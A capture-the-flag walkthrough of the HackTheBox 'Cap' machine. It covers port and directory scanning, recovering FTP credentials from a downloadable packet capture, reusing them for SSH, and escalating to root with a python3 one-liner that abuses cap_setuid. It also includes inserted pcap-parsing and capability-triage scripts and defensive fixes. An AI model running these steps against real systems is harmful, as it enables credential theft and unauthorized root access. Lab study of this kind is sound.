Cap HackTheBox WalkThrough

This is a walkthrough of the Cap machine on HackTheBox, in which I show step by step how I rooted it. Some background first: Cap is a Linux box with IP address 10.10.10.245 and a difficulty rating of Easy assigned by its maker.

First, connect to the HackTheBox VPN and confirm that you can reach the machine by pinging 10.10.10.245. If that works, it is time to start hacking. As usual, I began by scanning the machine. A scan tells us how to proceed: it grabs banners from the services listening on each port, and sometimes points straight at a vulnerable version. I used nmap for this task; the command and its result are given below:
Scanning
$ sudo nmap -sV -sT -p- -oN full-port.nmap 10.10.10.245

Nmap found ports 21, 22 and 80 open: vsftpd 3.0.3 on port 21, OpenSSH 8.2p1 on port 22 and a gunicorn web server on port 80. Since an FTP server was running, I first checked whether anonymous login was allowed; it was not. I then searched for a public exploit against vsftpd 3.0.3 and found none (the well-known vsftpd backdoor affects version 2.3.4 only, so it does not apply here).
Next I enumerated port 80. A web server on port 80 means there is a website at http://10.10.10.245/, so let us see what it serves. The site is a Security Dashboard showing statistics of the security events recorded for 10.10.10.245. A user named Nathan is already logged in, which makes nathan a likely account name once we are inside the machine.

With the username nathan in hand I started brute-forcing the FTP login and left it running in the background. Meanwhile I checked http://10.10.10.245/netstat and http://10.10.10.245/ip for command injection, because the application runs OS commands to produce those pages; no injection was found. When further enumeration turned up nothing interesting, I fell back, as usual, to directory brute-forcing.
Directory Bruteforcing
$ sudo dirsearch -u http://10.10.10.245/ -e all -t 100 -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt | tee dirsearch.out

$ sudo dirsearch -u http://10.10.10.245/data/ -e all -r 4 -t 100 -w /opt/SecLists/Discovery/Web-Content/raft-small-directories.txt | tee dirsearch-data.out

Directory brute-forcing turned up a whole series of numbered paths under /data/, and each one serves a different packet capture that can be downloaded directly. I downloaded the file at http://10.10.10.245/data/0 and opened it in Wireshark (a network protocol analyzer) to look at the traffic captured in it:
$ wireshark 0.pcap

The capture contains the login to nathan's FTP account. The USER and PASS commands are readable because FTP sends credentials in cleartext, so anyone who can see the traffic (or, as here, a stored capture of it) gets the password for free. This is why plain FTP should be replaced by SFTP (file transfer over SSH) or FTPS (FTP over TLS): the whole session, login included, is encrypted, and a captured stream reveals nothing useful. The FTP credential recovered from the capture is nathan:Buck3tH4TF0RM3!
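The same credential extraction done in code rather than by eye. This is an added example, not the author's code and not from any tool mentioned on the page: it walks the pcap record by record down to the TCP payload, pairs each USER with the PASS that follows it on the same connection, and uses the server's 230 reply to separate accepted logins from failed guesses, which a plain string search would not show. The capture it parses is built in memory with made-up hosts (192.0.2.x) and credentials so it runs offline; for the real file pass open("0.pcap", "rb").read() to extract_ftp_logins().

```python
"""
Pull FTP USER/PASS commands out of a classic pcap using only the standard
library. Added example for this walkthrough, not the author's code. The
capture at the bottom is constructed in memory (made-up hosts, port and
credentials) so the script runs offline.
"""
import struct

PCAP_MAGIC = 0xA1B2C3D4      # classic little-endian pcap (pcapng is rejected)
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
FTP_PORT = 21


def _tcp_segments(pcap_bytes):
    """Yield (src_ip, sport, dst_ip, dport, payload) for each TCP segment."""
    magic, _, _, _, _, _, linktype = struct.unpack("<IHHiIII", pcap_bytes[:24])
    if magic != PCAP_MAGIC or linktype != LINKTYPE_ETHERNET:
        raise ValueError("expected a little-endian pcap with Ethernet frames")
    off = 24
    while off + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack("<IIII", pcap_bytes[off:off + 16])
        frame = pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if len(frame) < 54 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue                                   # not IPv4 (or truncated)
        ip = frame[14:]
        if ip[9] != IPPROTO_TCP:
            continue
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]    # drops Ethernet padding
        src, dst = (".".join(map(str, ip[i:i + 4])) for i in (12, 16))
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        data_off = (tcp[12] >> 4) * 4
        yield src, sport, dst, dport, tcp[data_off:]


def _attempt(client, server, user=None):
    return {"client": client, "server": server, "user": user,
            "password": None, "success": False}


def extract_ftp_logins(pcap_bytes):
    """One dict per login attempt on an FTP control channel: USER paired with
    the next PASS on that connection, success=True once the server says 230."""
    typing, awaiting, results = {}, {}, []
    for src, sport, dst, dport, payload in _tcp_segments(pcap_bytes):
        if not payload:
            continue
        lines = payload.decode("latin-1").splitlines()
        if dport == FTP_PORT:                          # client -> server commands
            flow = (src, sport, dst)
            for line in lines:
                if line.upper().startswith("USER "):
                    typing[flow] = _attempt(src, dst, line[5:].strip())
                elif line.upper().startswith("PASS "):
                    attempt = typing.pop(flow, _attempt(src, dst))
                    attempt["password"] = line[5:].strip()
                    awaiting[flow] = attempt           # wait for the verdict
                    results.append(attempt)
        elif sport == FTP_PORT:                        # server -> client replies
            attempt = awaiting.get((dst, dport, src))
            if attempt and any(l.startswith("230") for l in lines):
                attempt["success"] = True
    return results


# ---- constructed sample capture: hosts, port and credentials are made up ----
def _frame(src, sport, dst, dport, payload):
    """Ethernet/IPv4/TCP frame; checksums stay zero, nothing here checks them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64,
                     IPPROTO_TCP, 0, bytes(map(int, src.split("."))),
                     bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4) + ip + tcp + payload


def build_pcap(frames):
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for ts, frame in enumerate(frames):
        out += struct.pack("<IIII", ts, 0, len(frame), len(frame)) + frame
    return out


CLIENT, SERVER, CPORT = "192.0.2.10", "192.0.2.21", 40001
SAMPLE_PCAP = build_pcap([
    _frame(SERVER, 21, CLIENT, CPORT, b"220 (vsFTPd 3.0.3)\r\n"),
    _frame(CLIENT, CPORT, SERVER, 21, b"USER alice\r\n"),
    _frame(CLIENT, CPORT, SERVER, 21, b"PASS wrong-guess\r\n"),
    _frame(SERVER, 21, CLIENT, CPORT, b"530 Login incorrect.\r\n"),
    _frame(CLIENT, CPORT, SERVER, 21, b"USER alice\r\n"),
    _frame(CLIENT, CPORT, SERVER, 21, b"PASS Example-Pass-123\r\n"),
    _frame(SERVER, 21, CLIENT, CPORT, b"230 Login successful.\r\n"),
    _frame(CLIENT, CPORT + 1, SERVER, 80, b"GET / HTTP/1.1\r\n\r\n"),  # ignored
])

if __name__ == "__main__":
    for hit in extract_ftp_logins(SAMPLE_PCAP):
        print(f"{hit['client']} -> {hit['server']}  {hit['user']}:{hit['password']}"
              f"  [{'accepted' if hit['success'] else 'rejected'}]")
```

Wireshark's own dissector does the same interactively: tshark -r 0.pcap -Y 'ftp.request.command == "USER" || ftp.request.command == "PASS"' -T fields -e ip.src -e ftp.request.command -e ftp.request.arg. The parser deliberately rejects pcapng and big-endian captures (different magic number); convert those first with editcap -F pcap in.pcapng out.pcap.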
These credentials let me log in to nathan's FTP account, and they also worked for SSH as nathan: the same password was reused across two different services. So let us SSH in as nathan.
Getting User Shell
$ ssh nathan@10.10.10.245
(password: Buck3tH4TF0RM3!)
$ whoami && id

We are logged in as nathan. Let us capture the user flag.
Capture User Flag
$ cat user.txt

Privilege Escalation
To escalate the privilege to root we have to first find a privilege escalation vector using which we can perform privilege escalation. We can find PrivEsc vector either manually or using some post exploitation enumeration scripts like linpeas.sh, LinEnum.sh and there are a lot more. I have used linpeas.sh
for this task.
Finding PrivEsc Vector
Linpeas found that the cap_setuid capability is set on the python3 binary. Linux capabilities split the powers of root into separate units that can be granted to an individual executable through its file attributes, so a program can hold one specific privilege without running as root. cap_setuid lets a process change its user ID to any UID, including 0 (the UID of root), so a python3 that carries it can hand root to whoever runs it. For this to work straight from os.setuid(), the capability must be in the file's permitted set with the effective flag on, which getcap prints as cap_setuid+ep (or cap_setuid=ep on newer libcap); check it with getcap $(readlink -f /usr/bin/python3) before relying on it. So our potential privilege escalation vector is capability abuse: use python3 to switch nathan's UID to 0.
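Linpeas' capability check, condensed into a script of my own as an added example (not the page's code and not linpeas' own): it parses getcap output in both layouts libcap has used, decodes a CapEff/CapPrm mask from /proc/<pid>/status, and reports which file capabilities are immediately exploitable and which are merely permitted, so that a cap_setuid+ep on python3 stands out from the harmless cap_net_raw on ping. The getcap lines it ships with are constructed, the /usr/bin/python3.8 path included.

```python
"""
Triage Linux file capabilities: parse `getcap -r /` output (older
'path = caps' and newer 'path caps' layouts), decode a CapEff mask from
/proc/<pid>/status, and flag capabilities with a known route to root.
Added example for this walkthrough, not the author's or linpeas' code;
SAMPLE_GETCAP below is constructed.
"""
import re
import subprocess

# Capability names in kernel numbering (<linux/capability.h>): index == bit.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]

# Each of these alone has a well-known route to root: setuid(0), ptrace into
# a root process, insmod, reading /etc/shadow, chown/chmod of root-owned
# files, raw disk access, or minting new file capabilities.
DANGEROUS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
    "cap_sys_module", "cap_dac_override", "cap_dac_read_search",
    "cap_chown", "cap_fowner", "cap_sys_rawio", "cap_setfcap",
}

_CLAUSE = re.compile(r"^([a-z0-9_,]*)((?:[=+-][eip]*)+)$")
_ACTION = re.compile(r"([=+-])([eip]*)")


def parse_cap_text(text):
    """libcap text form -> {cap_name: set of flags from e/i/p}.
    Clauses are whitespace separated; '=ep' with no names means every cap."""
    caps = {}
    for clause in text.split():
        m = _CLAUSE.match(clause)
        if not m:
            raise ValueError(f"unparseable capability clause: {clause!r}")
        names = [n for n in m.group(1).split(",") if n] or CAP_NAMES
        for op, flags in _ACTION.findall(m.group(2)):
            for name in names:
                cur = caps.setdefault(name, set())
                if op == "=":
                    cur.clear()
                if op == "-":
                    cur.difference_update(flags)
                else:
                    cur.update(flags)
    return {n: f for n, f in caps.items() if f}


def parse_getcap(output):
    """`getcap -r /` output -> [(path, caps)]; accepts both output layouts."""
    found = []
    for line in output.splitlines():
        tokens = line.split()
        if len(tokens) < 2:
            continue
        rest = tokens[2:] if tokens[1] == "=" else tokens[1:]
        found.append((tokens[0], parse_cap_text(" ".join(rest))))
    return found


def decode_cap_mask(hex_mask):
    """Value of a CapEff/CapPrm/CapBnd line in /proc/<pid>/status -> names."""
    mask = int(hex_mask, 16)
    return [name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1]


def triage(getcap_output):
    """(path, cap, verdict) for every dangerous file capability.
    'exploitable'    : permitted + effective, live as soon as the binary runs
    'permitted-only' : the program must raise it itself (capset) before use"""
    hits = []
    for path, caps in parse_getcap(getcap_output):
        for cap, flags in caps.items():
            if cap in DANGEROUS and "p" in flags:      # 'i' alone gives nothing
                verdict = "exploitable" if "e" in flags else "permitted-only"
                hits.append((path, cap, verdict))
    return hits


SAMPLE_GETCAP = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid+ep
/usr/bin/traceroute6.iputils cap_net_raw=ep
/usr/local/bin/backup-tool cap_dac_read_search=p
"""

if __name__ == "__main__":
    try:   # real system when getcap is installed, otherwise the sample
        output = subprocess.run(["getcap", "-r", "/"], capture_output=True,
                                text=True).stdout or SAMPLE_GETCAP
    except FileNotFoundError:
        output = SAMPLE_GETCAP
    for path, cap, verdict in triage(output):
        print(f"{verdict:15} {cap:22} {path}")
```

The distinction the triage draws between +ep and +p matters in practice: with only the permitted flag, os.setuid(0) in python3 fails with EPERM because the interpreter never raises the capability into its effective set. On the defending side the fix is the inverse of the attack: sudo setcap -r /usr/bin/python3.8 drops the capability, and getcap on the file afterwards should print nothing.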

Using python3 to change nathan's UID to 0 did indeed give me root, so the privilege escalation vector here is capability exploitation. If capabilities are new to you, the capabilities(7) man page is a good place to start. To get a root shell, follow the steps below.
Getting Root Shell
$ /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# whoami && id

We have root. Let us capture the root flag.
Capture Root Flag
$ cat /root/root.txt

That is how I rooted the Cap HackTheBox machine. I learnt a lot from this challenge and hope you picked up something new as well. Thanks for reading this walkthrough. For any query or suggestion about it, feel free to write to us at [email protected].